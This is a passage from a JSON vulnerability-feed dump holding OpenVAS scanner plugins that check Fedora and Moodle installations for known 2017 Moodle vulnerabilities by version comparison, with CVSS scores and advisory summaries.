"AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": ""}], "openvas": [{"lastseen": "2019-05-29T18:34:12", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-2643", "CVE-2017-2645", "CVE-2017-2644", "CVE-2017-2641"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2017-04-03T00:00:00", "id": "OPENVAS:1361412562310872543", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310872543", "type": "openvas", "title": "Fedora Update for moodle FEDORA-2017-0196511d58", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for moodle 
FEDORA-2017-0196511d58\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.872543\");\n script_version(\"$Revision: 14225 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 15:32:03 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-04-03 06:44:22 +0200 (Mon, 03 Apr 2017)\");\n script_cve_id(\"CVE-2017-2641\", \"CVE-2017-2643\", \"CVE-2017-2644\", \"CVE-2017-2645\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for moodle FEDORA-2017-0196511d58\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'moodle'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"moodle on Fedora 25\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", 
value:\"2017-0196511d58\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/OCNEFJWEFGLEXH5WBL3ZLDHPJZIZNV2P\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC25\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC25\")\n{\n\n if ((res = isrpmvuln(pkg:\"moodle\", rpm:\"moodle~3.1.5~1.fc25\", rls:\"FC25\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:34:37", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-2643", "CVE-2017-2645", "CVE-2017-2644", "CVE-2017-2641"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2017-04-01T00:00:00", "id": "OPENVAS:1361412562310872538", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310872538", "type": "openvas", "title": "Fedora Update for moodle FEDORA-2017-0fcaf52f1a", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for moodle FEDORA-2017-0fcaf52f1a\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software 
Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.872538\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-04-01 06:39:37 +0200 (Sat, 01 Apr 2017)\");\n script_cve_id(\"CVE-2017-2641\", \"CVE-2017-2643\", \"CVE-2017-2644\", \"CVE-2017-2645\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for moodle FEDORA-2017-0fcaf52f1a\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'moodle'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"moodle on Fedora 24\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2017-0fcaf52f1a\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/OT3KIHDUNM2GLI2CFSKIINN3YGXKZA27\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks 
GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC24\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC24\")\n{\n\n if ((res = isrpmvuln(pkg:\"moodle\", rpm:\"moodle~3.1.5~1.fc24\", rls:\"FC24\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:32:35", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-2643"], "description": "Global search displays user names for unauthenticated users.", "modified": "2018-10-26T00:00:00", "published": "2018-05-09T00:00:00", "id": "OPENVAS:1361412562310112270", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310112270", "type": "openvas", "title": "Moodle 3.2.x < 3.2.2 Information Disclosure Vulnerability (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_moodle_info_disc_vuln_mar17_01_win.nasl 12120 2018-10-26 11:13:20Z mmartin $\n#\n# Moodle 3.2.x < 3.2.2 Information Disclosure Vulnerability (Windows)\n#\n# Authors:\n# Adrian Steins <adrian.steins@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, https://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif( description )\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.112270\");\n script_version(\"$Revision: 12120 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 13:13:20 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2018-05-09 12:51:33 +0200 (Wed, 09 May 2018)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_cve_id(\"CVE-2017-2643\");\n script_bugtraq_id(96978);\n\n script_name(\"Moodle 3.2.x < 3.2.2 Information Disclosure Vulnerability (Windows)\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_moodle_cms_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"moodle/detected\", \"Host/runs_windows\");\n\n script_tag(name:\"summary\", value:\"Global search displays user names for unauthenticated users.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Global search does not respect 'Force login for profiles' setting\n and displays user names to guests when it should not (User profiles were still not displayed).\");\n script_tag(name:\"affected\", value:\"Moodle versions 3.2 to 3.2.1.\");\n script_tag(name:\"solution\", value:\"Update to version 3.2.2 or later.\");\n\n script_xref(name:\"URL\", 
value:\"https://moodle.org/mod/forum/discuss.php?d=349420\");\n\n exit(0);\n}\n\nCPE = \"cpe:/a:moodle:moodle\";\n\ninclude( \"host_details.inc\" );\ninclude( \"version_func.inc\" );\n\nif( ! port = get_app_port( cpe: CPE ) ) exit( 0 );\nif( ! infos = get_app_version_and_location( port: port, cpe:CPE, exit_no_version:TRUE ) ) exit( 0 );\nversion = infos['version'];\npath = infos['location'];\n\nif( version_in_range( version: version, test_version: \"3.2.0\", test_version2: \"3.2.1\" ) ) {\n report = report_fixed_ver( installed_version: version, fixed_version: \"3.2.2\", install_path: path );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:32:35", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-2643"], "description": "Global search displays user names for unauthenticated users.", "modified": "2018-10-26T00:00:00", "published": "2018-05-09T00:00:00", "id": "OPENVAS:1361412562310112269", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310112269", "type": "openvas", "title": "Moodle 3.2.x < 3.2.2 Information Disclosure Vulnerability (Linux)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_moodle_info_disc_vuln_mar17_01_lin.nasl 12120 2018-10-26 11:13:20Z mmartin $\n#\n# Moodle 3.2.x < 3.2.2 Information Disclosure Vulnerability (Linux)\n#\n# Authors:\n# Adrian Steins <adrian.steins@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, https://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without 
even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif( description )\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.112269\");\n script_version(\"$Revision: 12120 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 13:13:20 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2018-05-09 12:51:33 +0200 (Wed, 09 May 2018)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_cve_id(\"CVE-2017-2643\");\n script_bugtraq_id(96978);\n\n script_name(\"Moodle 3.2.x < 3.2.2 Information Disclosure Vulnerability (Linux)\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_moodle_cms_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"moodle/detected\", \"Host/runs_unixoide\");\n\n script_tag(name:\"summary\", value:\"Global search displays user names for unauthenticated users.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Global search does not respect 'Force login for profiles' setting\n and displays user names to guests when it should not (User profiles were still not displayed).\");\n script_tag(name:\"affected\", value:\"Moodle versions 3.2 to 3.2.1.\");\n script_tag(name:\"solution\", 
value:\"Update to version 3.2.2 or later.\");\n\n script_xref(name:\"URL\", value:\"https://moodle.org/mod/forum/discuss.php?d=349420\");\n\n exit(0);\n}\n\nCPE = \"cpe:/a:moodle:moodle\";\n\ninclude( \"host_details.inc\" );\ninclude( \"version_func.inc\" );\n\nif( ! port = get_app_port( cpe: CPE ) ) exit( 0 );\nif( ! infos = get_app_version_and_location( port: port, cpe:CPE, exit_no_version:TRUE ) ) exit( 0 );\nversion = infos['version'];\npath = infos['location'];\n\nif( version_in_range( version: version, test_version: \"3.2.0\", test_version2: \"3.2.1\" ) ) {\n report = report_fixed_ver( installed_version: version, fixed_version: \"3.2.2\", install_path: path );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nexit( 0 );\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:32:35", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-2641"], "description": "Moodle is prone to an authenticated remote code execution vulnerability.", "modified": "2018-10-26T00:00:00", "published": "2018-05-09T00:00:00", "id": "OPENVAS:1361412562310113183", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310113183", "type": "openvas", "title": "Moodle 2.x / 3.x Remote Code Execution Vulnerability - Mar'17 (Linux)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_moodle_rce_vuln_may18_01_lin.nasl 12120 2018-10-26 11:13:20Z mmartin $\n#\n# Moodle 2.x / 3.x Remote Code Execution Vulnerability - Mar'17 (Linux)\n#\n# Authors:\n# Jan Philipp Schulte <jan.schulte@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, https://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This 
program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif( description )\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.113183\");\n script_version(\"$Revision: 12120 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 13:13:20 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2018-05-09 13:16:19 +0200 (Wed, 09 May 2018)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_cve_id(\"CVE-2017-2641\");\n script_bugtraq_id(96977);\n\n script_name(\"Moodle 2.x / 3.x Remote Code Execution Vulnerability - Mar'17 (Linux)\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_moodle_cms_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"moodle/detected\", \"Host/runs_unixoide\");\n\n script_tag(name:\"summary\", value:\"Moodle is prone to an authenticated remote code execution vulnerability.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Remote Code Execution is made possible by a combination of\n\n - insufficiently restrictive administrator dashboard\n\n - PHP Object Injection Vulnerability\n\n - SQL 
Injection Vulnerability.\");\n script_tag(name:\"impact\", value:\"Successful exploitation could allow an authenticated attacker to\n take complete control over the target system.\");\n script_tag(name:\"affected\", value:\"Moodle versions through 2.7.18, 2.8.0 through 3.0.8, 3.1.0 through 3.1.4\n and 3.2.0 through 3.2.1.\");\n script_tag(name:\"solution\", value:\"Update to version 2.7.19, 3.0.9, 3.1.5 or 3.2.2 respectively.\");\n\n script_xref(name:\"URL\", value:\"https://moodle.org/mod/forum/discuss.php?d=349419\");\n\n exit(0);\n}\n\nCPE = \"cpe:/a:moodle:moodle\";\n\ninclude( \"host_details.inc\" );\ninclude( \"version_func.inc\" );\n\nif( ! port = get_app_port( cpe: CPE ) ) exit( 0 );\nif( ! infos = get_app_version_and_location( port: port, cpe:CPE, exit_no_version:TRUE ) ) exit( 0 );\nversion = infos['version'];\npath = infos['location'];\n\nif( version_is_less( version: version, test_version: \"2.7.19\" ) ) {\n report = report_fixed_ver( installed_version: version, fixed_version: \"2.7.19\", install_path: path );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nif( version_in_range( version: version, test_version: \"2.8.0\", test_version2: \"3.0.8\" ) ) {\n report = report_fixed_ver( installed_version: version, fixed_version: \"3.0.9\", install_path: path );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nif( version_in_range( version: version, test_version: \"3.1.0\", test_version2: \"3.1.4\" ) ) {\n report = report_fixed_ver( installed_version: version, fixed_version: \"3.1.5\", install_path: path );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nif( version_in_range( version: version, test_version: \"3.2.0\", test_version2: \"3.2.1\" ) ) {\n report = report_fixed_ver( installed_version: version, fixed_version: \"3.2.2\", install_path: path );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, 
{"lastseen": "2019-05-29T18:32:35", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-2641"], "description": "Moodle is prone to an authenticated remote code execution vulnerability.", "modified": "2018-10-26T00:00:00", "published": "2018-05-09T00:00:00", "id": "OPENVAS:1361412562310113184", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310113184", "type": "openvas", "title": "Moodle 2.x / 3.x Remote Code Execution Vulnerability - Mar'17 (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_moodle_rce_vuln_may18_01_win.nasl 12120 2018-10-26 11:13:20Z mmartin $\n#\n# Moodle 2.x / 3.x Remote Code Execution Vulnerability - Mar'17 (Windows)\n#\n# Authors:\n# Jan Philipp Schulte <jan.schulte@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, https://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif( description )\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.113184\");\n script_version(\"$Revision: 12120 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 13:13:20 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2018-05-09 13:16:19 +0200 (Wed, 09 May 2018)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_cve_id(\"CVE-2017-2641\");\n script_bugtraq_id(96977);\n\n script_name(\"Moodle 2.x / 3.x Remote Code Execution Vulnerability - Mar'17 (Windows)\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_moodle_cms_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"moodle/detected\", \"Host/runs_windows\");\n\n script_tag(name:\"summary\", value:\"Moodle is prone to an authenticated remote code execution vulnerability.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Remote Code Execution is made possible by a combination of\n\n - insufficiently restrictive administrator dashboard\n\n - PHP Object Injection Vulnerability\n\n - SQL Injection Vulnerability.\");\n script_tag(name:\"impact\", value:\"Successful exploitation could allow an authenticated attacker to\n take complete control over the target system.\");\n 
script_tag(name:\"affected\", value:\"Moodle versions through 2.7.18, 2.8.0 through 3.0.8, 3.1.0 through 3.1.4\n and 3.2.0 through 3.2.1.\");\n script_tag(name:\"solution\", value:\"Update to version 2.7.19, 3.0.9, 3.1.5 or 3.2.2 respectively.\");\n\n script_xref(name:\"URL\", value:\"https://moodle.org/mod/forum/discuss.php?d=349419\");\n\n exit(0);\n}\n\nCPE = \"cpe:/a:moodle:moodle\";\n\ninclude( \"host_details.inc\" );\ninclude( \"version_func.inc\" );\n\nif( ! port = get_app_port( cpe: CPE ) ) exit( 0 );\nif( ! infos = get_app_version_and_location( port: port, cpe:CPE, exit_no_version:TRUE ) ) exit( 0 );\nversion = infos['version'];\npath = infos['location'];\n\nif( version_is_less( version: version, test_version: \"2.7.19\" ) ) {\n report = report_fixed_ver( installed_version: version, fixed_version: \"2.7.19\", install_path: path );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nif( version_in_range( version: version, test_version: \"2.8.0\", test_version2: \"3.0.8\" ) ) {\n report = report_fixed_ver( installed_version: version, fixed_version: \"3.0.9\", install_path: path );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nif( version_in_range( version: version, test_version: \"3.1.0\", test_version2: \"3.1.4\" ) ) {\n report = report_fixed_ver( installed_version: version, fixed_version: \"3.1.5\", install_path: path );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nif( version_in_range( version: version, test_version: \"3.2.0\", test_version2: \"3.2.1\" ) ) {\n report = report_fixed_ver( installed_version: version, fixed_version: \"3.2.2\", install_path: path );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:32:35", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-2645", "CVE-2017-2644"], "description": "Moodle is prone to multiple XSS vulnerabilities.", "modified": 
"2018-10-26T00:00:00", "published": "2018-05-08T00:00:00", "id": "OPENVAS:1361412562310113180", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310113180", "type": "openvas", "title": "Moodle 3.x Multiple XSS Vulnerabilities - Mar'17 (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_moodle_mult_xss_vuln_win.nasl 12120 2018-10-26 11:13:20Z mmartin $\n#\n# Moodle 3.x Multiple XSS Vulnerabilities - Mar'17 (Windows)\n#\n# Authors:\n# Jan Philipp Schulte <jan.schulte@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, https://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif( description )\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.113180\");\n script_version(\"$Revision: 12120 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 13:13:20 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2018-05-08 14:24:34 +0200 (Tue, 08 May 2018)\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_cve_id(\"CVE-2017-2644\", \"CVE-2017-2645\");\n script_bugtraq_id(96979, 96982);\n\n script_name(\"Moodle 3.x Multiple XSS Vulnerabilities - Mar'17 (Windows)\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_moodle_cms_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"moodle/detected\", \"Host/runs_windows\");\n\n script_tag(name:\"summary\", value:\"Moodle is prone to multiple XSS vulnerabilities.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on a target host.\");\n script_tag(name:\"insight\", value:\"Users have the ability to upload evidence of prior learning.\n In this, both in the text and in the attachment, an XSS script could be embedded.\");\n script_tag(name:\"affected\", value:\"Moodle versions 3.1.0 through 3.1.4 and 3.2.0 through 3.2.1.\");\n script_tag(name:\"solution\", value:\"Update to version 3.1.5 or 3.2.2 respectively.\");\n\n 
script_xref(name:\"URL\", value:\"https://moodle.org/mod/forum/discuss.php?d=349421\");\n script_xref(name:\"URL\", value:\"https://moodle.org/mod/forum/discuss.php?d=349422\");\n\n exit(0);\n}\n\nCPE = \"cpe:/a:moodle:moodle\";\n\ninclude( \"host_details.inc\" );\ninclude( \"version_func.inc\" );\n\nif( ! port = get_app_port( cpe: CPE ) ) exit( 0 );\nif( ! infos = get_app_version_and_location( port: port, cpe:CPE, exit_no_version:TRUE ) ) exit( 0 );\nversion = infos['version'];\npath = infos['location'];\n\nif( version_in_range( version: version, test_version: \"3.1.0\", test_version2: \"3.1.4\" ) ) {\n report = report_fixed_ver( installed_version: version, fixed_version: \"3.1.5\", install_path: path );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nif( version_in_range( version: version, test_version: \"3.2.0\", test_version2: \"3.2.1\" ) ) {\n report = report_fixed_ver( installed_version: version, fixed_version: \"3.2.2\", install_path: path );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:32:35", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-2645", "CVE-2017-2644"], "description": "Moodle is prone to multiple XSS vulnerabilities.", "modified": "2018-10-26T00:00:00", "published": "2018-05-08T00:00:00", "id": "OPENVAS:1361412562310113179", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310113179", "type": "openvas", "title": "Moodle 3.x Multiple XSS Vulnerabilities - Mar'17 (Linux)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_moodle_mult_xss_vuln_lin.nasl 12120 2018-10-26 11:13:20Z mmartin $\n#\n# Moodle 3.x Multiple XSS Vulnerabilities - Mar'17 (Linux)\n#\n# Authors:\n# Jan Philipp Schulte <jan.schulte@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, 
